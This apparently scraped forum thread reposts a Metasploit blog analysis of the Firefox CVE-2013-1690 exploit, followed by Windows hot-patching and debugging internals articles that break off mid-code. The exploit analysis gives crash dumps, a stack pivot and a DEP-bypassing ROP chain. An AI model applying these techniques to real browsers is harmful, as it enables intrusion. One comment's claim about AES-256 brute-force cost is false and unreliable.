000b0f84 016f6ddd xul!nsHTMLDocument::Open+0x736 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1523]
000b0fe0 015015f0 xul!nsHTMLDocument::WriteCommon+0x22a4c7 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1700]
000b0ff4 015e6f2e xul!nsHTMLDocument::Write+0x1a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 1749]
000b1124 00ae1a59 xul!nsIDOMHTMLDocument_Write+0x537 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\obj-firefox\js\xpconnect\src\dom_quickstubs.cpp @ 13705]
000b1198 00ad2499 mozjs!js::InvokeKernel+0x59 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 352]
000b11e8 00af638a mozjs!js::Invoke+0x209 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 396]
000b1244 00a9ef36 mozjs!js::CrossCompartmentWrapper::call+0x13a [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jswrapper.cpp @ 736]
000b1274 00ae2061 mozjs!JSScript::ensureRanInference+0x16 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinferinlines.h @ 1584]
000b12e8 00ad93fd mozjs!js::InvokeKernel+0x661 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\js\src\jsinterp.cpp @ 345]

After ownerDocument.write() finishes, one of the window.stop() calls that was hanging begins to finish up, which brings us to xul!nsDocumentViewer::Stop. This function accesses the now-freed memory and crashes.
At this point you might see two different racy crashes: either it's accessing some memory that doesn't seem to be meant for that CALL, just because that part of the memory happens to fit in there, or you crash at mov ecx, dword ptr [eax] like the following:

0:000> r
eax=41414141 ebx=000b4600 ecx=0000006c edx=00000000 esi=0497c090 edi=067a24ac
eip=014c51ed esp=000b4510 ebp=000b4514 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
xul!DocumentViewerImpl::Stop+0x58:
014c51ed 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????

0:000> u . L3
014c51ed 8b08   mov ecx,dword ptr [eax]
014c51ef 50     push eax
014c51f0 ff5104 call dword ptr [ecx+4]

However, note that the crash doesn't necessarily have to end in xul!nsDocumentViewer::Stop, because in order to end up in this code path, two conditions must be met, as the following demonstrates:

NS_IMETHODIMP
DocumentViewerImpl::Stop(void)
{
  NS_ASSERTION(mDocument, "Stop called too early or too late");
  if (mDocument) {
    mDocument->StopDocumentLoad();
  }

  if (!mHidden && (mLoaded || mStopped) && mPresContext && !mSHEntry)
    mPresContext->SetImageAnimationMode(imgIContainer::kDontAnimMode);

  mStopped = true;

  if (!mLoaded && mPresShell) {
    // These are the two conditions that must be met
    // If you're here, you will crash
    nsCOMPtr<nsIPresShell> shellDeathGrip(mPresShell);
    mPresShell->UnsuppressPainting();
  }

  return NS_OK;
}

We discovered the above possibility because the exploit in the wild uses a different path to "call dword ptr [eax+4BCh]" in the function nsIDOMHTMLElement_GetInnerHTML, meaning that it actually survives xul!nsDocumentViewer::Stop. It's also using an information leak to properly craft an NTDLL ROP chain specifically for Windows 7.
The following example, based on the exploit in the wild, should demonstrate this, where we begin with the stack pivot:

eax=120a4018 ebx=002ec00c ecx=002ebf68 edx=00000001 esi=120a3010 edi=00000001
eip=66f05c12 esp=002ebf54 ebp=002ebf8c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
xul!xpc_LocalizeContext+0x3ca3f:
66f05c12 ff90bc040000 call dword ptr [eax+4BCh] ds:0023:120a44d4=33776277

We can see that the pivot is an XCHG EAX,ESP from NTDLL:

0:000> u 77627733 L6
ntdll!__from_strstr_to_strchr+0x9b:
77627733 94     xchg eax,esp
77627734 5e     pop esi
77627735 5f     pop edi
77627736 8d42ff lea eax,[edx-1]
77627739 5b     pop ebx
7762773a c3     ret

After pivoting, it goes through the whole NTDLL ROP chain, which calls ntdll!ZwProtectVirtualMemory to bypass DEP, and then finally gains code execution:

0:000> dd /c1 esp L9
120a4024 77625f18 ; ntdll!ZwProtectVirtualMemory
120a4028 120a5010
120a402c ffffffff
120a4030 120a4044
120a4034 120a4040
120a4038 00000040
120a403c 120a4048
120a4040 00040000
120a4044 120a5010

Note: the original exploit does not seem to work against Mozilla Firefox 17 (or other vulnerable versions) except for the Tor Browser, but you should still get a crash. We figured whoever wrote the exploit didn't really care about regular Firefox users, because apparently they've got nothing to hide.

Metasploit Module

Because of the complexity of the exploit, we've decided to do an initial release for Mozilla Firefox for now. An improved version of the exploit is already on the way, and hopefully we can get that out as soon as possible, so keep an eye on the blog and msfupdate, and stay tuned. Meanwhile, feel free to play FBI in your organization, and exercise that exploit in your next social engineering training campaign.

Mitigation

Protecting against this exploit is typically straightforward: all you need to do is upgrade your Firefox browser (or Tor Browser Bundle, which was the true target of the original exploit).
The vulnerability was patched and released by Mozilla back in late June of 2013, and the TBB was updated a couple of days later, so the world has had a little over a month to get on the patched versions. Given that, it would appear that the original adversaries here had reason to believe that, at least as of early August 2013, their target pool had not patched. If you're at all familiar with Firefox's normal updates, it's difficult to avoid getting patched; you need to go out of your way to skip updating, and you're more likely than not to screw that up and get patched by accident. However, since the people using Tor services are often relying on read-only media, like a LiveCD or a read-only virtual environment, it's slightly more difficult for them to get timely updates. Doing so means burning a new LiveCD, or marking their VM as writable to make updates persistent. In short, it looks like we have a case where good security advice (don't save anything on your secret operating system) got turned around into poor operational security practice, violating the "keep up on security patches" rule. Hopefully, this is a lesson learned.

Sursa: https://community.rapid7.com/community/metasploit/blog/2013/08/07/heres-that-fbi-firefox-exploit-for-you-cve-2013-1690
5. Key decryption? Or do you mean the possibility of brute-forcing 128-bit keys? Here is a simple, concrete example: if the NSA needs 1 million dollars to buy GPUs/CPUs to quickly crack a 128-bit AES key, then to crack a 256-bit key it would need 1 million * 1 million = 1,000 billion dollars ($1,000,000,000,000).
  6. https://rstforums.com/fisiere/defcon.zip
7. Microsoft Patching Internals

Author: EliCZ

Caveat Emptor

This article was not written to read like a novel. It is a to-the-point technical dump describing the inner workings of Microsoft's cold and hot patching process. The majority of the symbolic names listed below have been derived from NTDLL and NTOSKRNL. Please post any questions you may have directly to this article (for the benefit of others) and the author will gladly respond. The article may be updated in the future to include some of these answers inline. A companion download including examples and appropriate header files is available for download: MSPatching.zip.

Cold Patching

Replacing functions by replacing their containers - files and sections. The image to patch is "atomically replaced" with an image that contains all code and data contained within the original, plus the fixed functions and redirections to them through embedded hooks. The functions to update are statically hooked, and the hooks transfer execution to the fixed functions in the '.text_CP' or '.text_CO' section of a coldpatch module. This section is followed by the '.DBG_POR' section in situations where the original '.data' section has to be modified. In other cases, the '.text_CP' / '.text_CO' sections are followed by '.data_CP' or '.data_CO'. Overall, there can theoretically be as many _CP / _CO sections as the original image has (.text, .rdata, .data, etc.). The '.DBG_POR' section contains module imports, exports and debug information. The debug information for the coldpatch module usually consists of two entries. The first entry is of CODEVIEW type, the second is RESERVED10. RESERVED10 data contains the coldpatch debug information, which is comprised of the HOTPATCH_DEBUG_HEADER structure followed by the HOTPATCH_DEBUG_DATA structure. HOTPATCH_DEBUG_HEADER.Type has the value DEBUG_SIGNATURE_COLDPATCH.
The contents of HOTPATCH_DEBUG_DATA are used in a process called 'target module validation' when the validation of the original module fails and hotpatching checks whether a coldpatch is present. The atomic file replacement is realized by filling the SYSTEM_HOTPATCH_CODE_INFORMATION.RenameInfo structure and calling the SYSTEM_HOTPATCH_CODE_INFORMATION.Flags.HOTP_RENAME_FILES sub-function of the ExApplyCodePatch function (SystemHotpatchInformation class of Nt/ZwSetSystemInformation). The HOTP_RENAME_FILES sub-function is not implemented in newer OS versions/builds.

Replacing the image on a volume doesn't mean that all newly created processes will load/contain the updated image. For system purposes, for security, or to increase module loading speed, sections can be employed in the process of image loading. The section for a system module (ntdll.dll, ...) is updated by the HOTP_UPDATE_SYSDLL sub-function (no structure required). The section for the loader (from the \KnownDlls object directory) is updated by calling HOTP_UPDATE_KNOWNDLL with the AtomicSwap sub-structure filled. The old object's name is swapped with a newly created temporary object (update.exe names the section 'ColdPatchInstallationInProgres') in the object directory.

Hot Patching

Replacing functions by replacing their code in memory. Available since Server 2003 SP0 and XP SP2 (x86, ia64, x64). The functions were successfully fixed on the volume; now they should be changed in memory - in kernel memory for kernel modules, or in the memory of user processes that contain the module to update. The functions to patch are dynamically hooked - one sufficiently long CPU instruction or datum (pointer, RVA) of the function to fix is replaced with a branch instruction (pointer, RVA) that redirects the execution flow to a fixed function in the hotpatch module.
After applying the hooks, the patched module in memory looks like the coldpatch module, except that the targets of the branch instructions do not lie within the '.text_CP' section but in the code section(s) of the hotpatch module. The hotpatch module may contain debug information similar to the coldpatch's, except that the RESERVED10 data consists of HOTPATCH_DEBUG_HEADER only, and HOTPATCH_DEBUG_HEADER.Type has the value DEBUG_SIGNATURE_HOTPATCH. The hotpatch module must contain a section named '.hotp1 ' that is at least 80 bytes (sizeof(HOTPATCH_HEADER)) long and that must begin with a HOTPATCH_HEADER structure. The structure is used for validating the target module, fixing relocations and creating the intermediate RTL_PATCH_HEADER structure.

When applying the hotpatch to a user module, an updating agent enumerates the processes and creates remote threads in them that execute ntdll.LdrHotPatchRoutine. Newer OS versions/builds allow the remote thread creation from kernel mode when the HOTP_INJECT_THREAD sub-function is called and the InjectInfo sub-structure is correctly filled. LdrHotPatchRoutine checks whether the HOTP_USE_MODULE flag is set and the target module, whose base name is specified in UserModeInfo.TargetNameOffset, is present in the process. When applying the hotpatch to a kernel module (ntoskrnl.MmHotPatchRoutine), both the HOTP_USE_MODULE and HOTP_KERNEL_MODULE flags must be set and the KernelInfo sub-structure must be filled.

The source (hotpatch) module is loaded and checked for the presence of the '.hotp1 ' section, HOTPATCH_HEADER.Signature and Version. If an RTL_PATCH_HEADER for the source module already exists, hooks were successfully applied and the HOTP_PATCH_APPLY flag is clear, the hooks are removed. Otherwise an RTL_PATCH_HEADER is created, and the target module whose name is in HOTPATCH_HEADER.TargetNameRva is checked for presence and validated according to ModuleIdMethod using TargetModuleIdValue.
If there is a validation mismatch, the system checks whether the target module is the coldpatch, according to the coldpatch debug info. If it is the coldpatch, the PATCHFLAG_COLDPATCH_VALID flag is set in RTL_PATCH_HEADER.PatchFlags.

The functions to fix may access the target image; they can call its functions and use its variables (meaning pointers and call/jump targets do not have to be in the hotpatch module, because they point directly into the target module). Such code must be fixed using special relocation fixups from HOTPATCH_HEADER.FixupRgnRva, with respect to HOTPATCH_HEADER.OrigHotpBaseAddress and HOTPATCH_HEADER.OrigTargetBaseAddress. The functions then behave as if they were called from the original module. The number of HOTPATCH_FIXUP_ENTRY structures in a HOTPATCH_FIXUP_REGION must be even. If the hotpatch contains standard base relocations, they usually apply only to pointers into the hotpatch's import table (APIs).

Various places in the target module can be validated according to the HOTPATCH_VALIDATION structures at HOTPATCH_HEADER.ValidationArrayRva. Validations with the option HOTP_Valid_Hook_Target are skipped (those are the places to patch). HOTPATCH_HOOK_DESCRIPTOR structures are prepared according to the HOTPATCH_HOOK structures at HOTPATCH_HEADER.HookArrayRva. The first 5 bits of HOTPATCH_HOOK.HookOptions contain the length of the instruction to replace, which must be at least as long as the branch instruction - the rest is, for some hook types, padded with bytes of value 0xCC. Again, there is the possibility to validate the bytes that will be replaced (HOTP_Valid_Hook_Target now has no effect). If there is a mismatch and the patch location already contains the adequate branch instruction, the list of RTL_PATCH_HEADER structures in TargetModule.LDR_DATA_TABLE_ENTRY.PatchInformation is traversed and the bytes at HOTPATCH_HOOK_DESCRIPTOR.CodeOffset are compared with the prepared branch instruction.
If there is a mismatch and the target module is the coldpatch, validation succeeds for some hook types; for the other ones, it is checked whether the branch instruction points into the coldpatch. Upon successful validation and hook preparation, the remaining members of RTL_PATCH_HEADER are filled in, the sections of the target module are made writable, and the hooks are written by calling ExApplyCodePatch with RTL_PATCH_HEADER.CodeInfo and the HOTP_PATCH flag set. If the patch application succeeds, the RTL_PATCH_HEADER is linked into the TargetModule.LDR_DATA_TABLE_ENTRY.PatchInformation list.

There's no security issue: Debug and LoadDriver privileges must be enabled for all cold/hotpatch operations, except for user-mode hotpatching or when applying CodeInfo directly. CodeInfo cannot be applied directly to the kernel when calling ExApplyCodePatch from user mode. CodeInfo is applied "os-atomically" - preemption is unlikely. The function to fix doesn't have to be compiled/linked with the /hotpatch (/functionpadmin) option. There's no public tool (a special version of the C compiler or linker?) for creating the cold/hotpatches. It is possible to write a tool that adds/writes the '.hotp1 ' section of an image created by normal compiling/linking, but there are two problems: how to write the new function with instructions pointing into the target module, and the fixup handling connected with this. Then again, one doesn't have to use the target module's functions/data, so there is no need for the hotpatch fixups.
Hook Types

HOTP_Hook_None
HOTP_Hook_VA32 - 32-bit value/pointer, 4 bytes
HOTP_Hook_X86_JMP - x86/64 long relative jump, E9 Rel32, <-2GB..2GB-1>, Rel32 constructed according to Hook/HotpRva, >= 5 bytes, padded with 0xCC
HOTP_Hook_PCREL32 - not yet implemented, for fixing the Rel32 of an x86/64 call or jump, 4 bytes
HOTP_Hook_X86_JMP2B - x86/64 short relative jump, EB Rel8, <-128B..127B>, Rel8 is in HotpRva, >= 2 bytes, padded with 0xCC
HOTP_Hook_VA64 - 64-bit value/pointer, 8 bytes
HOTP_Hook_IA64_BRL - ia64 branch; at HookRva there must be a supported template type, >= 16 bytes
HOTP_Hook_IA64_BR - not yet implemented
HOTP_Hook_AMD64_IND - x86/64 absolute indirect jump, FF 25 [Offset32 / Rip+Rel32]; HotpRva (+Rip) must point to a variable that contains a pointer to the fixed function, >= 6 bytes, padded with 0xCC
HOTP_Hook_AMD64_CNT - 16-bit value/pointer, 2 bytes

Hook combinations are allowed - HOTP_Hook_X86_JMP2B + HOTP_Hook_X86_JMP is typical. When the hotpatch-target distance exceeds 2GB, HOTP_Hook_AMD64_IND must be employed on x86/64. One then needs a place to store the pointer specified in [Offset32 / Rip+Rel32]. For x86 it can be inside the hotpatch module, but for x64 it cannot. HOTP_Hook_AMD64_IND + HOTP_Hook_VA64 is the solution. The /hotpatch option for x64 is not yet implemented, but I would suggest:

Buffer:                                        ; for HOTP_Hook_VA64
8x nop
FnStart:
48 8D A4 24 00 00 00 00   lea rsp, [rsp + 0]   ; 2 bytes more than required
or
0F 8x 00 00 00 00         j?? $+6              ; as long as required but slower

In Coldpatch/After Hotpatching it could look like:

Buffer:
Ptr64 FnContinue
FnStart:
FF 25 F2 FF FF FF         jmp qword ptr [Buffer]   ; [Rip-14]
CC CC

Of course there is the possibility of a triple patch: JMP2B -> IND -> VA64.

x86 Patch Examples

A function created with /hotpatch, a "semi-hotpatchable" function, and a "non-hotpatchable" function. You may notice that more than one CPU instruction is replaced (5x nop plus the long relative jmp), but the nops are not involved in the function - they serve as a buffer.
[TABLE]
[TR]
[TD=class: table_sub_sub_header]Original Function[/TD]
[TD=class: table_sub_sub_header]ColdPatch/After HotPatching[/TD]
[TD=class: table_sub_sub_header]In Cold/HotPatch[/TD]
[/TR]
[TR]
[TD]
5x 90          5x nop
FnStart:
8B FF          mov edi, edi
55             push ebp
8B EC          mov ebp, esp
56             push esi
57             push edi
8B 35 g_Data   mov esi, g_Data

5x 90          5x nop
FnStart:
55             push ebp
8B EC          mov ebp, esp
56             push esi
57             push edi
8B 35 g_Data   mov esi, g_Data

FnStart:
55             push ebp
8B EC          mov ebp, esp
56             push esi
57             push edi
8B 35 g_Data   mov esi, g_Data
[/TD]
[TD]
E9 Rel32       jmp FnContinue
FnStart:
EB F9          jmp $-5
55             push ebp
8B EC          mov ebp, esp
56             push esi
57             push edi
8B 35 g_Data   mov esi, g_Data

E9 Rel32       jmp FnContinue
FnStart:
55             push ebp
EB F8          jmp $-6
56             push esi
57             push edi
8B 35 g_Data   mov esi, g_Data

FnStart:
55             push ebp
8B EC          mov ebp, esp
56             push esi
57             push edi
E9 Rel32       jmp FnContinue
CC             int 3
[/TD]
[TD]
FnStart:
FnContinue:
55             push ebp
8B EC          mov ebp, esp
56             push esi
57             push edi
8B 35 g_Data   mov esi, g_Data   ; fixup required

FnStart:
55             push ebp
FnContinue:
8B EC          mov ebp, esp
56             push esi
57             push edi
8B 35 g_Data   mov esi, g_Data   ; fixup required

FnStart:
55             push ebp
8B EC          mov ebp, esp
56             push esi
57             push edi
FnContinue:
8B 35 g_Data   mov esi, g_Data   ; fixup required
[/TD]
[/TR]
[/TABLE]

References
- Inside Update.exe - Windows Server | Deploy, Manage, Troubleshoot
- KB packages for Server2003 x86 that contain the cold/hotpatches: 819696, 823182, 888113, 893086, 899588, 901190

Sursa: OpenRCE
8. Windows User Mode Debugging Internals

Author: AlexIonescu

Introduction

The internal mechanisms of what allows user-mode debugging to work have rarely ever been fully explained. Even worse, these mechanisms changed radically in Windows XP, when much of the support was rewritten, as well as made more subsystem-portable by including most of the routines in ntdll, as part of the Native API. This three-part series will explain this functionality, starting from the Win32 (kernel32) viewpoint all the way down (or up) to the NT kernel (ntoskrnl) component responsible for this support, called Dbgk, while making a stop at the NT System Library (ntdll) and its DbgUi component. The reader is expected to have some basic knowledge of C and general NT kernel architecture and semantics. Also, this is not an introduction to what debugging is or how to write a debugger. It is meant as a reference for experienced debugger writers, or curious security experts.

Win32 Debugging

The Win32 subsystem of NT has allowed the debugging of processes ever since the first release, with later releases adding more features and debugging help libraries related to symbols and other PE information. However, relatively few things have changed for the outside API user, except for the welcome addition of the ability to stop debugging a process without killing it, which was added in Windows XP. This release of NT also contained several overhauls of the underlying implementation, which will be discussed in detail. However, one important side effect of these changes was that LPC (and csrss.exe) is not used anymore, which made debugging of this binary possible (previously, debugging this binary was impossible, since it was the one responsible for handling the kernel-to-user notifications).
The basic Win32 APIs for debugging a process were simple: DebugActiveProcess to attach, WaitForDebugEvent to wait for debug events to come through so that your debugger can handle them, and ContinueDebugEvent to resume thread execution. The release of Windows XP added three more useful APIs: DebugActiveProcessStop, which allows you to stop debugging a process (detach); DebugSetProcessKillOnExit, which allows you to continue running a process even after it's been detached; and DebugBreakProcess, which allows you to perform a remote DebugBreak without having to manually create a remote thread. In Windows XP Service Pack 1, one more API was added: CheckRemoteDebuggerPresent. Much like its IsDebuggerPresent counterpart, this API allows you to check for a connected debugger in another process, without having to read the PEB remotely.

Because of NT's architecture, these APIs, on recent versions of Windows (2003 will be used as an example, but the information applies to XP as well), do not do much work themselves. Instead, they do the typical job of calling the native functions required, and then process the output so that the Win32 caller can have it in a format that is compatible with Win9x and the original Win32 API definition.
Let's look at these very simple implementations:

BOOL
WINAPI
DebugActiveProcess(IN DWORD dwProcessId)
{
    NTSTATUS Status;
    HANDLE Handle;

    /* Connect to the debugger */
    Status = DbgUiConnectToDbg();
    if (!NT_SUCCESS(Status))
    {
        SetLastErrorByStatus(Status);
        return FALSE;
    }

    /* Get the process handle */
    Handle = ProcessIdToHandle(dwProcessId);
    if (!Handle) return FALSE;

    /* Now debug the process */
    Status = DbgUiDebugActiveProcess(Handle);
    NtClose(Handle);

    /* Check if debugging worked */
    if (!NT_SUCCESS(Status))
    {
        /* Fail */
        SetLastErrorByStatus(Status);
        return FALSE;
    }

    /* Success */
    return TRUE;
}

As you can see, the only work that's being done here is to create the initial connection to the user-mode debugging component, which is done through the DbgUi Native API set, located in ntdll, which we'll see later. Because DbgUi uses handles instead of PIDs, the PID must first be converted with a simple helper function:

HANDLE
WINAPI
ProcessIdToHandle(IN DWORD dwProcessId)
{
    NTSTATUS Status;
    OBJECT_ATTRIBUTES ObjectAttributes;
    HANDLE Handle;
    CLIENT_ID ClientId;

    /* If we don't have a PID, look it up */
    if (dwProcessId == -1) dwProcessId = (DWORD)CsrGetProcessId();

    /* Open a handle to the process */
    ClientId.UniqueProcess = (HANDLE)dwProcessId;
    InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
    Status = NtOpenProcess(&Handle,
                           PROCESS_ALL_ACCESS,
                           &ObjectAttributes,
                           &ClientId);
    if (!NT_SUCCESS(Status))
    {
        /* Fail */
        SetLastErrorByStatus(Status);
        return 0;
    }

    /* Return the handle */
    return Handle;
}

If you are not familiar with the Native API, it is sufficient to say that this code is the simple equivalent of an OpenProcess on the PID, so that a handle can be obtained. Going back to DebugActiveProcess, the final call which does the work is DbgUiDebugActiveProcess, which is again located in the Native API. After the connection is made, we can close the handle that we had obtained from the PID previously. Other APIs function much in the same way.
Let's take a look at two of the newer XP ones:

BOOL
WINAPI
DebugBreakProcess(IN HANDLE Process)
{
    NTSTATUS Status;

    /* Send the breakin request */
    Status = DbgUiIssueRemoteBreakin(Process);
    if (!NT_SUCCESS(Status))
    {
        /* Failure */
        SetLastErrorByStatus(Status);
        return FALSE;
    }

    /* Success */
    return TRUE;
}

BOOL
WINAPI
DebugSetProcessKillOnExit(IN BOOL KillOnExit)
{
    HANDLE Handle;
    NTSTATUS Status;
    ULONG State;

    /* Get the debug object */
    Handle = DbgUiGetThreadDebugObject();
    if (!Handle)
    {
        /* Fail */
        SetLastErrorByStatus(STATUS_INVALID_HANDLE);
        return FALSE;
    }

    /* Now set the kill-on-exit state */
    State = KillOnExit;
    Status = NtSetInformationDebugObject(Handle,
                                         DebugObjectKillProcessOnExitInformation,
                                         &State,
                                         sizeof(State),
                                         NULL);
    if (!NT_SUCCESS(Status))
    {
        /* Fail */
        SetLastError(Status);
        return FALSE;
    }

    /* Success */
    return TRUE;
}

The first hopefully requires no explanation, as it's a simple wrapper, but let's take a look at the second. If you're familiar with the Native API, you'll instantly recognize the familiar NtSetInformationXxx type of API, which is used for setting various settings on the different types of NT objects, such as files, processes, threads, etc. The interesting thing to note here, which is new to XP, is that debugging itself is also now done with a Debug Object. The specifics of this object will, however, be discussed later. For now, let's look at the function. The first API, DbgUiGetThreadDebugObject, is another call to DbgUi, which will return a handle to the Debug Object associated with our thread (we'll see where this is stored later). Once we have the handle, we call a Native API which directly communicates with Dbgk (and not DbgUi), which will simply change a flag in the kernel's Debug Object structure. This flag, as we'll see, will be read by the kernel when detaching.
A similar function to this one is CheckRemoteDebuggerPresent, which uses the same type of NT semantics to obtain the information about the process:

BOOL
WINAPI
CheckRemoteDebuggerPresent(IN HANDLE hProcess,
                           OUT PBOOL pbDebuggerPresent)
{
    HANDLE DebugPort;
    NTSTATUS Status;

    /* Make sure we have an output and process */
    if (!(pbDebuggerPresent) || !(hProcess))
    {
        /* Fail */
        SetLastError(ERROR_INVALID_PARAMETER);
        return FALSE;
    }

    /* Check if the process has a debug object/port */
    Status = NtQueryInformationProcess(hProcess,
                                       ProcessDebugPort,
                                       (PVOID)&DebugPort,
                                       sizeof(HANDLE),
                                       NULL);
    if (NT_SUCCESS(Status))
    {
        /* Return the current state */
        *pbDebuggerPresent = (DebugPort) ? TRUE : FALSE;
        return TRUE;
    }

    /* Otherwise, fail */
    SetLastErrorByStatus(Status);
    return FALSE;
}

As you can see, another NtQuery/SetInformationXxx API is being used, but this time for the process. Although you probably know that, to detect debugging, one can simply check NtCurrentPeb()->BeingDebugged, there exists another way to do this: querying the kernel. Since the kernel needs to communicate with user mode on debugging events, it needs some way of doing this. Before XP, this used to be done through an LPC port, and now through a Debug Object (which shares the same pointer, however). Since the port is located in the EPROCESS structure in kernel mode, we do a query using the DebugPort information class. If EPROCESS->DebugPort is set to something, then this API will return TRUE, which means that the process is being debugged. This trick can also be used for the local process, but it's much faster to simply read the PEB. One can notice that although some applications like to set Peb->BeingDebugged to FALSE to trick anti-debugging checks, there is no way to set DebugPort to NULL, since the kernel itself would then not let you debug (and you also don't have access to kernel structures).
With that in mind, let's see how the gist of the entire Win32 debugging infrastructure, WaitForDebugEvent, is implemented. This needs to be shown before the much-simpler ContinueDebugEvent/DebugActiveProcessStop, because it introduces Win32's high-level internal structure that it uses to wrap around DbgUi. BOOLWINAPI WaitForDebugEvent(IN LPDEBUG_EVENT lpDebugEvent, IN DWORD dwMilliseconds) { LARGE_INTEGER WaitTime; PLARGE_INTEGER Timeout; DBGUI_WAIT_STATE_CHANGE WaitStateChange; NTSTATUS Status; /* Check if this is an infinite wait */ if (dwMilliseconds == INFINITE) { /* Under NT, this means no timer argument */ Timeout = NULL; } else { /* Otherwise, convert the time to NT Format */ WaitTime.QuadPart = UInt32x32To64(-10000, dwMilliseconds); Timeout = &WaitTime; } /* Loop while we keep getting interrupted */ do { /* Call the native API */ Status = DbgUiWaitStateChange(&WaitStateChange, Timeout); } while ((Status == STATUS_ALERTED) || (Status == STATUS_USER_APC)); /* Check if the wait failed */ if (!(NT_SUCCESS(Status)) || (Status != DBG_UNABLE_TO_PROVIDE_HANDLE)) { /* Set the error code and quit */ SetLastErrorByStatus(Status); return FALSE; } /* Check if we timed out */ if (Status == STATUS_TIMEOUT) { /* Fail with a timeout error */ SetLastError(ERROR_SEM_TIMEOUT); return FALSE; } /* Convert the structure */ Status = DbgUiConvertStateChangeStructure(&WaitStateChange, lpDebugEvent); if (!NT_SUCCESS(Status)) { /* Set the error code and quit */ SetLastErrorByStatus(Status); return FALSE; } /* Check what kind of event this was */ switch (lpDebugEvent->dwDebugEventCode) { /* New thread was created */ case CREATE_THREAD_DEBUG_EVENT: /* Setup the thread data */ SaveThreadHandle(lpDebugEvent->dwProcessId, lpDebugEvent->dwThreadId, lpDebugEvent->u.CreateThread.hThread); break; /* New process was created */ case CREATE_PROCESS_DEBUG_EVENT: /* Setup the process data */ SaveProcessHandle(lpDebugEvent->dwProcessId, lpDebugEvent->u.CreateProcessInfo.hProcess); /* Setup the 
thread data */ SaveThreadHandle(lpDebugEvent->dwProcessId, lpDebugEvent->dwThreadId, lpDebugEvent->u.CreateThread.hThread); break; /* Process was exited */ case EXIT_PROCESS_DEBUG_EVENT: /* Mark the thread data as such */ MarkProcessHandle(lpDebugEvent->dwProcessId); break; /* Thread was exited */ case EXIT_THREAD_DEBUG_EVENT: /* Mark the thread data */ MarkThreadHandle(lpDebugEvent->dwThreadId); break; /* Nothing to do for anything else */ default: break; } /* Return success */ return TRUE; } First, let's look at the DbgUi APIs present. The first, DbgUiWaitStateChange is the Native version of WaitForDebugEvent, and it's responsible for doing the actual wait on the Debug Object, and getting the structure associated with this event. However, DbgUi uses its own internal structures (which we'll show later) so that the Kernel can understand it, while Win32 has had much different structures defined in the Win9x ways. Therefore, one needs to convert this to the Win32 representation, and the DbgUiConvertStateChange API is what does this conversion, returning the LPDEBUG_EVENT Win32 structure that is backwards-compatible and documented on MSDN. What follows after is a switch which is interested in the creation or deletion of a new process or thread. Four APIs are used: SaveProcessHandle and SaveThreadHandle, which save these respective handles (remember that a new process must have an associated thread, so the thread handle is saved as well), and MarkProcessHandle and MarkThreadHandle, which flag these handles as being exited. Let's look as this high-level framework in detail. 
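Before diving into that framework, one small detail from WaitForDebugEvent above is worth isolating: the conversion of a Win32 millisecond timeout into the negative NT relative time (100-nanosecond units) that the native layer expects. A minimal sketch, assuming a plain 64-bit signed integer stands in for LARGE_INTEGER:

```c
#include <stdint.h>

/* Sketch of the timeout conversion performed by WaitForDebugEvent:
   1 ms = 10,000 units of 100 ns, and a negative value means
   "relative to now" in NT timer semantics. */
static int64_t MillisecondsToNtRelativeTime(uint32_t dwMilliseconds)
{
    return (int64_t)-10000 * (int64_t)dwMilliseconds;
}
```

So a one-second Win32 timeout becomes -10,000,000 in NT units, which is exactly what the UInt32x32To64(-10000, dwMilliseconds) expression in the listing computes.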
VOID WINAPI SaveProcessHandle(IN DWORD dwProcessId,
                              IN HANDLE hProcess)
{
    PDBGSS_THREAD_DATA ThreadData;

    /* Allocate a thread structure */
    ThreadData = RtlAllocateHeap(RtlGetProcessHeap(), 0, sizeof(DBGSS_THREAD_DATA));
    if (!ThreadData) return;

    /* Fill it out */
    ThreadData->ProcessHandle = hProcess;
    ThreadData->ProcessId = dwProcessId;
    ThreadData->ThreadId = 0;
    ThreadData->ThreadHandle = NULL;
    ThreadData->HandleMarked = FALSE;

    /* Link it */
    ThreadData->Next = DbgSsGetThreadData();
    DbgSsSetThreadData(ThreadData);
}

This function allocates a new structure, DBGSS_THREAD_DATA, and simply fills it out with the process handle and ID that were sent. Finally, it links it with the current DBGSS_THREAD_DATA structure, and sets itself as the new current one (thus creating a circular list of DBGSS_THREAD_DATA structures). Let's take a look at this structure:

typedef struct _DBGSS_THREAD_DATA
{
    struct _DBGSS_THREAD_DATA *Next;
    HANDLE ThreadHandle;
    HANDLE ProcessHandle;
    DWORD ProcessId;
    DWORD ThreadId;
    BOOLEAN HandleMarked;
} DBGSS_THREAD_DATA, *PDBGSS_THREAD_DATA;

This generic structure thus allows storing process/thread handles and IDs, as well as the flag which we've talked about in regards to MarkProcess/ThreadHandle. We've also seen some DbgSsSet/GetThreadData functions, which will show us where this circular array of structures is located. Let's look at their implementations:

#define DbgSsSetThreadData(d) \
    NtCurrentTeb()->DbgSsReserved[0] = d

#define DbgSsGetThreadData() \
    ((PDBGSS_THREAD_DATA)NtCurrentTeb()->DbgSsReserved[0])

Easy enough, and now we know what the first element of the mysterious DbgSsReserved array in the TEB is.
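The save/mark bookkeeping can be demonstrated outside Windows with a small simulation, where a file-scope pointer stands in for the TEB's DbgSsReserved[0] slot. The structure and field names follow the article; everything else (the allocator, the slot variable) is illustrative:

```c
#include <stdlib.h>

/* Portable sketch of Win32's per-thread debug handle bookkeeping. */
typedef struct _DBGSS_THREAD_DATA {
    struct _DBGSS_THREAD_DATA *Next;
    void *ThreadHandle;
    void *ProcessHandle;
    unsigned ProcessId;
    unsigned ThreadId;
    int HandleMarked;
} DBGSS_THREAD_DATA;

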